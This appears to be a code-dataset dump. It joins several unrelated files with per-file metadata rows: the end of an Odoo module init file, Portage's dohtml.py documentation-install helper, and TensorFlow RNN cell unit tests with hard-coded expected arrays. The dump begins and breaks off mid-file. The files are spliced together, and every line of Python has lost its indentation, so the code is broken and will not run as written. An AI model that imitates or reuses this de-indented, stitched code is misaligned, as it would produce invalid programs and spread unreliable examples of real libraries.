# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import sale_order
from . import sale_order_line
from . import mrp_property_group
| agpl-3.0 | -3,072,007,925,824,498,700 | 42.625 | 78 | 0.608405 | false |
funtoo/portage-funtoo | bin/dohtml.py | 1 | 6296 | #!/usr/bin/python
# Copyright 1999-2013 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
#
# Typical usage:
# dohtml -r docs/*
# - put all files and directories in docs into /usr/share/doc/${PF}/html
# dohtml foo.html
# - put foo.html into /usr/share/doc/${PF}/html
#
#
# Detailed usage:
# dohtml <list-of-files>
# - will install the files in the list of files (space-separated list) into
# /usr/share/doc/${PF}/html, provided the file ends in .css, .gif, .htm,
# .html, .jpeg, .jpg, .js or .png.
# dohtml -r <list-of-files-and-directories>
# - will do as 'dohtml', but recurse into all directories, as long as the
# directory name is not CVS
# dohtml -A jpe,java [-r] <list-of-files[-and-directories]>
# - will do as 'dohtml' but add .jpe,.java (default filter list is
# added to your list)
# dohtml -a png,gif,html,htm [-r] <list-of-files[-and-directories]>
# - will do as 'dohtml' but filter on .png,.gif,.html,.htm (default filter
# list is ignored)
# dohtml -x CVS,SCCS,RCS -r <list-of-files-and-directories>
# - will do as 'dohtml -r', but ignore directories named CVS, SCCS, RCS
#
from __future__ import print_function
import os
import sys
# Change back to original cwd _after_ all imports (bug #469338).
os.chdir(os.environ["__PORTAGE_HELPER_CWD"])
def dodir(path):
os.spawnlp(os.P_WAIT, "install", "install", "-d", path)
def dofile(src,dst):
os.spawnlp(os.P_WAIT, "install", "install", "-m0644", src, dst)
def eqawarn(lines):
cmd = "source '%s/isolated-functions.sh' ; " % \
os.environ["PORTAGE_BIN_PATH"]
for line in lines:
cmd += "eqawarn \"%s\" ; " % line
os.spawnlp(os.P_WAIT, "bash", "bash", "-c", cmd)
skipped_directories = []
skipped_files = []
warn_on_skipped_files = os.environ.get("PORTAGE_DOHTML_WARN_ON_SKIPPED_FILES") is not None
unwarned_skipped_extensions = os.environ.get("PORTAGE_DOHTML_UNWARNED_SKIPPED_EXTENSIONS", "").split()
unwarned_skipped_files = os.environ.get("PORTAGE_DOHTML_UNWARNED_SKIPPED_FILES", "").split()
def install(basename, dirname, options, prefix=""):
fullpath = basename
if prefix:
fullpath = prefix + "/" + fullpath
if dirname:
fullpath = dirname + "/" + fullpath
if options.DOCDESTTREE:
destdir = options.ED + "usr/share/doc/" + options.PF + "/" + options.DOCDESTTREE + "/" + options.doc_prefix + "/" + prefix
else:
destdir = options.ED + "usr/share/doc/" + options.PF + "/html/" + options.doc_prefix + "/" + prefix
if not os.path.exists(fullpath):
sys.stderr.write("!!! dohtml: %s does not exist\n" % fullpath)
return False
elif os.path.isfile(fullpath):
ext = os.path.splitext(basename)[1][1:]
if ext in options.allowed_exts or basename in options.allowed_files:
dodir(destdir)
dofile(fullpath, destdir + "/" + basename)
elif warn_on_skipped_files and ext not in unwarned_skipped_extensions and basename not in unwarned_skipped_files:
skipped_files.append(fullpath)
elif options.recurse and os.path.isdir(fullpath) and \
basename not in options.disallowed_dirs:
for i in os.listdir(fullpath):
pfx = basename
if prefix: pfx = prefix + "/" + pfx
install(i, dirname, options, pfx)
elif not options.recurse and os.path.isdir(fullpath):
global skipped_directories
skipped_directories.append(fullpath)
return False
else:
return False
return True
class OptionsClass:
def __init__(self):
self.PF = ""
self.ED = ""
self.DOCDESTTREE = ""
if "PF" in os.environ:
self.PF = os.environ["PF"]
if "force-prefix" not in os.environ.get("FEATURES", "").split() and \
os.environ.get("EAPI", "0") in ("0", "1", "2"):
self.ED = os.environ.get("D", "")
else:
self.ED = os.environ.get("ED", "")
if "_E_DOCDESTTREE_" in os.environ:
self.DOCDESTTREE = os.environ["_E_DOCDESTTREE_"]
self.allowed_exts = ['css', 'gif', 'htm', 'html', 'jpeg', 'jpg', 'js', 'png']
if os.environ.get("EAPI", "0") in ("4-python", "5-progress"):
self.allowed_exts += ['ico', 'svg', 'xhtml', 'xml']
self.allowed_files = []
self.disallowed_dirs = ['CVS']
self.recurse = False
self.verbose = False
self.doc_prefix = ""
def print_help():
opts = OptionsClass()
print("dohtml [-a .foo,.bar] [-A .foo,.bar] [-f foo,bar] [-x foo,bar]")
print(" [-r] [-V] <file> [file ...]")
print()
print(" -a Set the list of allowed to those that are specified.")
print(" Default:", ",".join(opts.allowed_exts))
print(" -A Extend the list of allowed file types.")
print(" -f Set list of allowed extensionless file names.")
print(" -x Set directories to be excluded from recursion.")
print(" Default:", ",".join(opts.disallowed_dirs))
print(" -p Set a document prefix for installed files (empty by default).")
print(" -r Install files and directories recursively.")
print(" -V Be verbose.")
print()
def parse_args():
options = OptionsClass()
args = []
x = 1
while x < len(sys.argv):
arg = sys.argv[x]
if arg in ["-h","-r","-V"]:
if arg == "-h":
print_help()
sys.exit(0)
elif arg == "-r":
options.recurse = True
elif arg == "-V":
options.verbose = True
elif sys.argv[x] in ["-A","-a","-f","-x","-p"]:
x += 1
if x == len(sys.argv):
print_help()
sys.exit(0)
elif arg == "-p":
options.doc_prefix = sys.argv[x]
else:
values = sys.argv[x].split(",")
if arg == "-A":
options.allowed_exts.extend(values)
elif arg == "-a":
options.allowed_exts = values
elif arg == "-f":
options.allowed_files = values
elif arg == "-x":
options.disallowed_dirs = values
else:
args.append(sys.argv[x])
x += 1
return (options, args)
def main():
(options, args) = parse_args()
if options.verbose:
print("Allowed extensions:", options.allowed_exts)
print("Document prefix : '" + options.doc_prefix + "'")
print("Allowed files :", options.allowed_files)
success = False
for x in args:
basename = os.path.basename(x)
dirname = os.path.dirname(x)
success |= install(basename, dirname, options)
for x in skipped_directories:
eqawarn(["QA Notice: dohtml on directory '%s' without recursion option" % x])
for x in skipped_files:
eqawarn(["dohtml: skipped file '%s'" % x])
if success:
retcode = 0
else:
retcode = 1
sys.exit(retcode)
if __name__ == "__main__":
main()
| gpl-2.0 | -243,913,840,125,863,680 | 29.862745 | 124 | 0.644377 | false |
anand-c-goog/tensorflow | tensorflow/contrib/rnn/python/kernel_tests/rnn_cell_test.py | 4 | 34623 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for RNN cells."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class RNNCellTest(tf.test.TestCase):
def testCoupledInputForgetGateLSTMCell(self):
with self.test_session() as sess:
num_units = 2
state_size = num_units * 2
batch_size = 3
input_size = 4
expected_output = np.array(
[[0.121753, 0.121753],
[0.103349, 0.103349],
[0.100178, 0.100178]],
dtype=np.float32)
expected_state = np.array(
[[0.137523, 0.137523, 0.121753, 0.121753],
[0.105450, 0.105450, 0.103349, 0.103349],
[0.100742, 0.100742, 0.100178, 0.100178]],
dtype=np.float32)
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([batch_size, input_size])
m = tf.zeros([batch_size, state_size])
output, state = tf.contrib.rnn.CoupledInputForgetGateLSTMCell(
num_units=num_units, forget_bias=1.0)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state],
{x.name: np.array([[1., 1., 1., 1.],
[2., 2., 2., 2.],
[3., 3., 3., 3.]]),
m.name: 0.1 * np.ones((batch_size, state_size))})
# This is a smoke test: Only making sure expected values didn't change.
self.assertEqual(len(res), 2)
self.assertAllClose(res[0], expected_output)
self.assertAllClose(res[1], expected_state)
def testTimeFreqLSTMCell(self):
with self.test_session() as sess:
num_units = 8
state_size = num_units * 2
batch_size = 3
input_size = 4
feature_size = 2
frequency_skip = 1
num_shifts = (input_size - feature_size) / frequency_skip + 1
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([batch_size, input_size])
m = tf.zeros([batch_size, state_size*num_shifts])
output, state = tf.contrib.rnn.TimeFreqLSTMCell(
num_units=num_units, feature_size=feature_size,
frequency_skip=frequency_skip, forget_bias=1.0)(x, m)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state],
{x.name: np.array([[1., 1., 1., 1.],
[2., 2., 2., 2.],
[3., 3., 3., 3.]]),
m.name: 0.1 * np.ones((batch_size, state_size*(
num_shifts)))})
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is mostly just a
# smoke test.
self.assertEqual(res[0].shape, (batch_size, num_units*num_shifts))
self.assertEqual(res[1].shape, (batch_size, state_size*num_shifts))
# Different inputs so different outputs and states
for i in range(1, batch_size):
self.assertTrue(
float(np.linalg.norm((res[0][0, :] - res[0][i, :]))) > 1e-6)
self.assertTrue(
float(np.linalg.norm((res[1][0, :] - res[1][i, :]))) > 1e-6)
def testGridLSTMCell(self):
with self.test_session() as sess:
num_units = 8
batch_size = 3
input_size = 4
feature_size = 2
frequency_skip = 1
num_shifts = int((input_size - feature_size) / frequency_skip + 1)
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.rnn.GridLSTMCell(
num_units=num_units, feature_size=feature_size,
frequency_skip=frequency_skip, forget_bias=1.0,
num_frequency_blocks=[num_shifts],
couple_input_forget_gates=True,
state_is_tuple=True)
inputs = tf.constant(np.array([[1., 1., 1., 1.],
[2., 2., 2., 2.],
[3., 3., 3., 3.]],
dtype=np.float32), dtype=tf.float32)
state_value = tf.constant(
0.1 * np.ones((batch_size, num_units), dtype=np.float32),
dtype=tf.float32)
init_state = cell.state_tuple_type(
*([state_value, state_value] * num_shifts))
output, state = cell(inputs, init_state)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state])
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is mostly just a
# smoke test.
self.assertEqual(res[0].shape, (batch_size, num_units * num_shifts * 2))
for ss in res[1]:
self.assertEqual(ss.shape, (batch_size, num_units))
# Different inputs so different outputs and states
for i in range(1, batch_size):
self.assertTrue(
float(np.linalg.norm((res[0][0, :] - res[0][i, :]))) > 1e-6)
self.assertTrue(float(np.linalg.norm(
(res[1].state_f00_b00_c[0, :] - res[1].state_f00_b00_c[i, :])))
> 1e-6)
def testGridLSTMCellWithFrequencyBlocks(self):
with self.test_session() as sess:
num_units = 8
batch_size = 3
input_size = 4
feature_size = 2
frequency_skip = 1
num_frequency_blocks = [1, 1]
total_blocks = num_frequency_blocks[0] + num_frequency_blocks[1]
start_freqindex_list = [0, 2]
end_freqindex_list = [2, 4]
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.rnn.GridLSTMCell(
num_units=num_units, feature_size=feature_size,
frequency_skip=frequency_skip, forget_bias=1.0,
num_frequency_blocks=num_frequency_blocks,
start_freqindex_list=start_freqindex_list,
end_freqindex_list=end_freqindex_list,
couple_input_forget_gates=True,
state_is_tuple=True)
inputs = tf.constant(np.array([[1., 1., 1., 1.],
[2., 2., 2., 2.],
[3., 3., 3., 3.]],
dtype=np.float32), dtype=tf.float32)
state_value = tf.constant(
0.1 * np.ones((batch_size, num_units), dtype=np.float32),
dtype=tf.float32)
init_state = cell.state_tuple_type(
*([state_value, state_value] * total_blocks))
output, state = cell(inputs, init_state)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state])
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is mostly just a
# smoke test.
self.assertEqual(res[0].shape,
(batch_size, num_units * total_blocks * 2))
for ss in res[1]:
self.assertEqual(ss.shape, (batch_size, num_units))
# Different inputs so different outputs and states
for i in range(1, batch_size):
self.assertTrue(
float(np.linalg.norm((res[0][0, :] - res[0][i, :]))) > 1e-6)
self.assertTrue(float(np.linalg.norm(
(res[1].state_f00_b00_c[0, :] - res[1].state_f00_b00_c[i, :])))
> 1e-6)
def testGridLstmCellWithCoupledInputForgetGates(self):
num_units = 2
batch_size = 3
input_size = 4
feature_size = 2
frequency_skip = 1
num_shifts = int((input_size - feature_size) / frequency_skip + 1)
expected_output = np.array(
[[0.416383, 0.416383, 0.403238, 0.403238, 0.524020, 0.524020,
0.565425, 0.565425, 0.557865, 0.557865, 0.609699, 0.609699],
[0.627331, 0.627331, 0.622393, 0.622393, 0.688342, 0.688342,
0.708078, 0.708078, 0.694245, 0.694245, 0.715171, 0.715171],
[0.711050, 0.711050, 0.709197, 0.709197, 0.736533, 0.736533,
0.744264, 0.744264, 0.737390, 0.737390, 0.745250, 0.745250]],
dtype=np.float32)
expected_state = np.array(
[[0.625556, 0.625556, 0.416383, 0.416383, 0.759134, 0.759134,
0.524020, 0.524020, 0.798795, 0.798795, 0.557865, 0.557865],
[0.875488, 0.875488, 0.627331, 0.627331, 0.936432, 0.936432,
0.688342, 0.688342, 0.941961, 0.941961, 0.694245, 0.694245],
[0.957327, 0.957327, 0.711050, 0.711050, 0.979522, 0.979522,
0.736533, 0.736533, 0.980245, 0.980245, 0.737390, 0.737390]],
dtype=np.float32)
for state_is_tuple in [False, True]:
with self.test_session() as sess:
with tf.variable_scope("state_is_tuple" + str(state_is_tuple),
initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.rnn.GridLSTMCell(
num_units=num_units, feature_size=feature_size,
frequency_skip=frequency_skip, forget_bias=1.0,
num_frequency_blocks=[num_shifts],
couple_input_forget_gates=True,
state_is_tuple=state_is_tuple)
inputs = tf.constant(np.array([[1., 1., 1., 1.],
[2., 2., 2., 2.],
[3., 3., 3., 3.]],
dtype=np.float32), dtype=tf.float32)
if state_is_tuple:
state_value = tf.constant(
0.1 * np.ones((batch_size, num_units), dtype=np.float32),
dtype=tf.float32)
init_state = cell.state_tuple_type(
*([state_value, state_value] * num_shifts))
else:
init_state = tf.constant(
0.1 * np.ones((batch_size, num_units * num_shifts * 2),
dtype=np.float32),
dtype=tf.float32)
output, state = cell(inputs, init_state)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state])
# This is a smoke test: Only making sure expected values not change.
self.assertEqual(len(res), 2)
self.assertAllClose(res[0], expected_output)
if not state_is_tuple:
self.assertAllClose(res[1], expected_state)
else:
# There should be num_shifts * 2 states in the tuple.
self.assertEqual(len(res[1]), num_shifts * 2)
# Checking the shape of each state to be batch_size * num_units
for ss in res[1]:
self.assertEqual(ss.shape[0], batch_size)
self.assertEqual(ss.shape[1], num_units)
self.assertAllClose(np.concatenate(res[1], axis=1), expected_state)
def testBidirectionGridLSTMCell(self):
with self.test_session() as sess:
num_units = 2
batch_size = 3
input_size = 4
feature_size = 2
frequency_skip = 1
num_shifts = int((input_size - feature_size) / frequency_skip + 1)
expected_output = np.array(
[[0.464130, 0.464130, 0.419165, 0.419165, 0.593283, 0.593283,
0.738350, 0.738350, 0.661638, 0.661638, 0.866774, 0.866774,
0.520789, 0.520789, 0.476968, 0.476968, 0.604341, 0.604341,
0.760207, 0.760207, 0.635773, 0.635773, 0.850218, 0.850218],
[0.669636, 0.669636, 0.628966, 0.628966, 0.736057, 0.736057,
0.895927, 0.895927, 0.755559, 0.755559, 0.954359, 0.954359,
0.692621, 0.692621, 0.652363, 0.652363, 0.737517, 0.737517,
0.899558, 0.899558, 0.745984, 0.745984, 0.946840, 0.946840],
[0.751109, 0.751109, 0.711716, 0.711716, 0.778357, 0.778357,
0.940779, 0.940779, 0.784530, 0.784530, 0.980604, 0.980604,
0.759940, 0.759940, 0.720652, 0.720652, 0.778552, 0.778552,
0.941606, 0.941606, 0.781035, 0.781035, 0.977731, 0.977731]],
dtype=np.float32)
expected_state = np.array(
[[0.710660, 0.710660, 0.464130, 0.464130, 0.877293, 0.877293,
0.593283, 0.593283, 0.958505, 0.958505, 0.661638, 0.661638,
0.785405, 0.785405, 0.520789, 0.520789, 0.890836, 0.890836,
0.604341, 0.604341, 0.928512, 0.928512, 0.635773, 0.635773],
[0.967579, 0.967579, 0.669636, 0.669636, 1.038811, 1.038811,
0.736057, 0.736057, 1.058201, 1.058201, 0.755559, 0.755559,
0.993088, 0.993088, 0.692621, 0.692621, 1.040288, 1.040288,
0.737517, 0.737517, 1.048773, 1.048773, 0.745984, 0.745984],
[1.053842, 1.053842, 0.751109, 0.751109, 1.079919, 1.079919,
0.778357, 0.778357, 1.085620, 1.085620, 0.784530, 0.784530,
1.062455, 1.062455, 0.759940, 0.759940, 1.080101, 1.080101,
0.778552, 0.778552, 1.082402, 1.082402, 0.781035, 0.781035]],
dtype=np.float32)
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.rnn.BidirectionalGridLSTMCell(
num_units=num_units, feature_size=feature_size,
share_time_frequency_weights=True,
frequency_skip=frequency_skip, forget_bias=1.0,
num_frequency_blocks=[num_shifts])
inputs = tf.constant(np.array([[1.0, 1.1, 1.2, 1.3],
[2.0, 2.1, 2.2, 2.3],
[3.0, 3.1, 3.2, 3.3]],
dtype=np.float32), dtype=tf.float32)
state_value = tf.constant(
0.1 * np.ones((batch_size, num_units), dtype=np.float32),
dtype=tf.float32)
init_state = cell.state_tuple_type(
*([state_value, state_value] * num_shifts * 2))
output, state = cell(inputs, init_state)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state])
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is mostly just a
# smoke test.
self.assertEqual(res[0].shape, (batch_size, num_units*num_shifts*4))
self.assertAllClose(res[0], expected_output)
# There should be num_shifts * 4 states in the tuple.
self.assertEqual(len(res[1]), num_shifts * 4)
# Checking the shape of each state to be batch_size * num_units
for ss in res[1]:
self.assertEqual(ss.shape[0], batch_size)
self.assertEqual(ss.shape[1], num_units)
self.assertAllClose(np.concatenate(res[1], axis=1), expected_state)
def testBidirectionGridLSTMCellWithSliceOffset(self):
with self.test_session() as sess:
num_units = 2
batch_size = 3
input_size = 4
feature_size = 2
frequency_skip = 1
num_shifts = int((input_size - feature_size) / frequency_skip + 1)
expected_output = np.array(
[[0.464130, 0.464130, 0.419165, 0.419165, 0.593283, 0.593283,
0.738350, 0.738350, 0.661638, 0.661638, 0.866774, 0.866774,
0.322645, 0.322645, 0.276068, 0.276068, 0.584654, 0.584654,
0.690292, 0.690292, 0.640446, 0.640446, 0.840071, 0.840071],
[0.669636, 0.669636, 0.628966, 0.628966, 0.736057, 0.736057,
0.895927, 0.895927, 0.755559, 0.755559, 0.954359, 0.954359,
0.493625, 0.493625, 0.449236, 0.449236, 0.730828, 0.730828,
0.865996, 0.865996, 0.749429, 0.749429, 0.944958, 0.944958],
[0.751109, 0.751109, 0.711716, 0.711716, 0.778357, 0.778357,
0.940779, 0.940779, 0.784530, 0.784530, 0.980604, 0.980604,
0.608587, 0.608587, 0.566683, 0.566683, 0.777345, 0.777345,
0.925820, 0.925820, 0.782597, 0.782597, 0.976858, 0.976858]],
dtype=np.float32)
expected_state = np.array(
[[0.710660, 0.710660, 0.464130, 0.464130, 0.877293, 0.877293,
0.593283, 0.593283, 0.958505, 0.958505, 0.661638, 0.661638,
0.516575, 0.516575, 0.322645, 0.322645, 0.866628, 0.866628,
0.584654, 0.584654, 0.934002, 0.934002, 0.640446, 0.640446],
[0.967579, 0.967579, 0.669636, 0.669636, 1.038811, 1.038811,
0.736057, 0.736057, 1.058201, 1.058201, 0.755559, 0.755559,
0.749836, 0.749836, 0.493625, 0.493625, 1.033488, 1.033488,
0.730828, 0.730828, 1.052186, 1.052186, 0.749429, 0.749429],
[1.053842, 1.053842, 0.751109, 0.751109, 1.079919, 1.079919,
0.778357, 0.778357, 1.085620, 1.085620, 0.784530, 0.784530,
0.895999, 0.895999, 0.608587, 0.608587, 1.078978, 1.078978,
0.777345, 0.777345, 1.083843, 1.083843, 0.782597, 0.782597]],
dtype=np.float32)
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
cell = tf.contrib.rnn.BidirectionalGridLSTMCell(
num_units=num_units, feature_size=feature_size,
share_time_frequency_weights=True,
frequency_skip=frequency_skip, forget_bias=1.0,
num_frequency_blocks=[num_shifts],
backward_slice_offset=1)
inputs = tf.constant(np.array([[1.0, 1.1, 1.2, 1.3],
[2.0, 2.1, 2.2, 2.3],
[3.0, 3.1, 3.2, 3.3]],
dtype=np.float32), dtype=tf.float32)
state_value = tf.constant(
0.1 * np.ones((batch_size, num_units), dtype=np.float32),
dtype=tf.float32)
init_state = cell.state_tuple_type(
*([state_value, state_value] * num_shifts * 2))
output, state = cell(inputs, init_state)
sess.run([tf.initialize_all_variables()])
res = sess.run([output, state])
self.assertEqual(len(res), 2)
# The numbers in results were not calculated, this is mostly just a
# smoke test.
self.assertEqual(res[0].shape, (batch_size, num_units*num_shifts*4))
self.assertAllClose(res[0], expected_output)
# There should be num_shifts * 4 states in the tuple.
self.assertEqual(len(res[1]), num_shifts * 4)
# Checking the shape of each state to be batch_size * num_units
for ss in res[1]:
self.assertEqual(ss.shape[0], batch_size)
self.assertEqual(ss.shape[1], num_units)
self.assertAllClose(np.concatenate(res[1], axis=1), expected_state)
def testAttentionCellWrapperFailures(self):
with self.assertRaisesRegexp(
TypeError, "The parameter cell is not RNNCell."):
tf.contrib.rnn.AttentionCellWrapper(None, 0)
num_units = 8
for state_is_tuple in [False, True]:
with tf.Graph().as_default():
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(
num_units, state_is_tuple=state_is_tuple)
with self.assertRaisesRegexp(
ValueError, "attn_length should be greater than zero, got 0"):
tf.contrib.rnn.AttentionCellWrapper(lstm_cell, 0,
state_is_tuple=state_is_tuple)
with self.assertRaisesRegexp(
ValueError, "attn_length should be greater than zero, got -1"):
tf.contrib.rnn.AttentionCellWrapper(lstm_cell, -1,
state_is_tuple=state_is_tuple)
with tf.Graph().as_default():
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(
num_units, state_is_tuple=True)
with self.assertRaisesRegexp(
ValueError, "Cell returns tuple of states, but the flag "
"state_is_tuple is not set. State size is: *"):
tf.contrib.rnn.AttentionCellWrapper(
lstm_cell, 4, state_is_tuple=False)
def testAttentionCellWrapperZeros(self):
num_units = 8
attn_length = 16
batch_size = 3
input_size = 4
for state_is_tuple in [False, True]:
with tf.Graph().as_default():
with self.test_session() as sess:
with tf.variable_scope("state_is_tuple_" + str(state_is_tuple)):
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(
num_units, state_is_tuple=state_is_tuple)
cell = tf.contrib.rnn.AttentionCellWrapper(
lstm_cell, attn_length, state_is_tuple=state_is_tuple)
if state_is_tuple:
zeros = tf.zeros(
[batch_size, num_units], dtype=np.float32)
attn_state_zeros = tf.zeros(
[batch_size, attn_length * num_units], dtype=np.float32)
zero_state = ((zeros, zeros), zeros, attn_state_zeros)
else:
zero_state = tf.zeros(
[batch_size, num_units * 2 + attn_length
* num_units + num_units], dtype=np.float32)
inputs = tf.zeros([batch_size, input_size], dtype=tf.float32)
output, state = cell(inputs, zero_state)
self.assertEquals(output.get_shape(), [batch_size, num_units])
if state_is_tuple:
self.assertEquals(len(state), 3)
self.assertEquals(len(state[0]), 2)
self.assertEquals(state[0][0].get_shape(),
[batch_size, num_units])
self.assertEquals(state[0][1].get_shape(),
[batch_size, num_units])
self.assertEquals(state[1].get_shape(), [batch_size, num_units])
self.assertEquals(state[2].get_shape(),
[batch_size, attn_length * num_units])
tensors = [output] + list(state)
else:
self.assertEquals(
state.get_shape(), [batch_size, num_units * 2 + num_units
+ attn_length * num_units])
tensors = [output, state]
zero_result = sum([tf.reduce_sum(tf.abs(x)) for x in tensors])
sess.run(tf.initialize_all_variables())
self.assertTrue(sess.run(zero_result) < 1e-6)
def testAttentionCellWrapperValues(self):
num_units = 8
attn_length = 16
batch_size = 3
for state_is_tuple in [False, True]:
with tf.Graph().as_default():
with self.test_session() as sess:
with tf.variable_scope("state_is_tuple_" + str(state_is_tuple)):
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(
num_units, state_is_tuple=state_is_tuple)
cell = tf.contrib.rnn.AttentionCellWrapper(
lstm_cell, attn_length, state_is_tuple=state_is_tuple)
if state_is_tuple:
zeros = tf.constant(
0.1 * np.ones([batch_size, num_units],
dtype=np.float32), dtype=tf.float32)
attn_state_zeros = tf.constant(
0.1 * np.ones([batch_size, attn_length * num_units],
dtype=np.float32), dtype=tf.float32)
zero_state = ((zeros, zeros), zeros, attn_state_zeros)
else:
zero_state = tf.constant(
0.1 * np.ones([batch_size, num_units * 2 + num_units
+ attn_length * num_units],
dtype=np.float32), dtype=tf.float32)
inputs = tf.constant(np.array([[1., 1., 1., 1.],
[2., 2., 2., 2.],
[3., 3., 3., 3.]],
dtype=np.float32), dtype=tf.float32)
output, state = cell(inputs, zero_state)
if state_is_tuple:
concat_state = tf.concat(
1, [state[0][0], state[0][1], state[1], state[2]])
else:
concat_state = state
sess.run(tf.initialize_all_variables())
output, state = sess.run([output, concat_state])
# Different inputs so different outputs and states
for i in range(1, batch_size):
self.assertTrue(
float(np.linalg.norm((output[0, :] - output[i, :]))) > 1e-6)
self.assertTrue(
float(np.linalg.norm((state[0, :] - state[i, :]))) > 1e-6)
def testAttentionCellWrapperCorrectResult(self):
num_units = 4
attn_length = 6
batch_size = 2
expected_output = np.array(
[[-0.76951641, -0.77613342, 0.1882876, 0.4528169],
[-0.62173879, -0.53987527, 0.06999521, 0.43236512]], dtype=np.float32)
expected_state = np.array(
[[0.00686008, 0.32751927, 0.65842509, 0.13517606, 0.00341745,
0.21539585, 0.2087716, 0.04919484, 0.65901887, 0.71350443, 0.45989594,
0.32038051, 0.58086717, 0.49446869, 0.7641536, 0.12814975, 0.92231739,
0.89857256, 0.21889746, 0.38442063, 0.53481543, 0.8876909, 0.45823169,
0.5905602, 0.78038228, 0.56501579, 0.03971386, 0.09870267, 0.8074435,
0.66821432, 0.99211812, 0.12295902, -0.78066337, -0.55385113,
0.25296241, 0.29621673],
[-2.65422642e-01, 7.69232273e-01, 2.61641771e-01, 3.12298536e-03,
-1.54120743e-01, 4.68760282e-01, 9.73877981e-02, 9.45428968e-04,
7.77730405e-01, 6.53964162e-01, 4.54966187e-01, 4.93799955e-01,
7.30002642e-01, 6.69868946e-01, 7.35766888e-01, 8.63012671e-01,
8.78873706e-01, 3.51857543e-01, 9.34172153e-01, 6.47329569e-01,
6.31730437e-01, 6.66278243e-01, 5.36446571e-01, 2.04774857e-01,
9.84584212e-01, 3.82772446e-01, 3.74667645e-02, 9.25101876e-01,
5.77141643e-01, 8.49329710e-01, 3.61274123e-01, 1.21259212e-01,
-6.95882142e-01, -7.14576960e-01, 5.69079161e-01, 3.14788610e-01]],
dtype=np.float32)
seed = 12345
tf.set_random_seed(seed)
for state_is_tuple in [False, True]:
with tf.Session() as sess:
with tf.variable_scope("state_is_tuple", reuse=state_is_tuple):
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(
num_units, state_is_tuple=state_is_tuple)
cell = tf.contrib.rnn.AttentionCellWrapper(
lstm_cell, attn_length, state_is_tuple=state_is_tuple)
zeros1 = tf.random_uniform(
(batch_size, num_units), 0.0, 1.0, seed=seed+1)
zeros2 = tf.random_uniform(
(batch_size, num_units), 0.0, 1.0, seed=seed+2)
zeros3 = tf.random_uniform(
(batch_size, num_units), 0.0, 1.0, seed=seed+3)
attn_state_zeros = tf.random_uniform(
(batch_size, attn_length * num_units), 0.0, 1.0, seed=seed+4)
zero_state = ((zeros1, zeros2), zeros3, attn_state_zeros)
if not state_is_tuple:
zero_state = tf.concat(1,
[zero_state[0][0], zero_state[0][1],
zero_state[1], zero_state[2]])
inputs = tf.random_uniform(
(batch_size, num_units), 0.0, 1.0, seed=seed+5)
output, state = cell(inputs, zero_state)
if state_is_tuple:
state = tf.concat(1, [state[0][0], state[0][1], state[1], state[2]])
sess.run(tf.initialize_all_variables())
self.assertAllClose(sess.run(output), expected_output)
self.assertAllClose(sess.run(state), expected_state)
class LayerNormBasicLSTMCellTest(tf.test.TestCase):
# NOTE: all the values in the current test case have been calculated.
def testBasicLSTMCell(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=tf.constant_initializer(0.5)):
x = tf.zeros([1, 2])
c0 = tf.zeros([1, 2])
h0 = tf.zeros([1, 2])
state0 = tf.nn.rnn_cell.LSTMStateTuple(c0, h0)
c1 = tf.zeros([1, 2])
h1 = tf.zeros([1, 2])
state1 = tf.nn.rnn_cell.LSTMStateTuple(c1, h1)
state = (state0, state1)
cell = tf.contrib.rnn.LayerNormBasicLSTMCell(2)
cell = tf.nn.rnn_cell.MultiRNNCell([cell] * 2)
g, out_m = cell(x, state)
sess.run([tf.initialize_all_variables()])
res = sess.run([g, out_m],
{
x.name: np.array([[1., 1.]]),
c0.name: 0.1 * np.asarray([[0, 1]]),
h0.name: 0.1 * np.asarray([[2, 3]]),
c1.name: 0.1 * np.asarray([[4, 5]]),
h1.name: 0.1 * np.asarray([[6, 7]]),
})
expected_h = np.array([[-0.38079708, 0.38079708]])
expected_state0_c = np.array([[-1.0, 1.0]])
expected_state0_h = np.array([[-0.38079708, 0.38079708]])
expected_state1_c = np.array([[-1.0, 1.0]])
expected_state1_h = np.array([[-0.38079708, 0.38079708]])
actual_h = res[0]
actual_state0_c = res[1][0].c
actual_state0_h = res[1][0].h
actual_state1_c = res[1][1].c
actual_state1_h = res[1][1].h
self.assertAllClose(actual_h, expected_h, 1e-5)
self.assertAllClose(expected_state0_c, actual_state0_c, 1e-5)
self.assertAllClose(expected_state0_h, actual_state0_h, 1e-5)
self.assertAllClose(expected_state1_c, actual_state1_c, 1e-5)
self.assertAllClose(expected_state1_h, actual_state1_h, 1e-5)
with tf.variable_scope("other", initializer=tf.constant_initializer(0.5)):
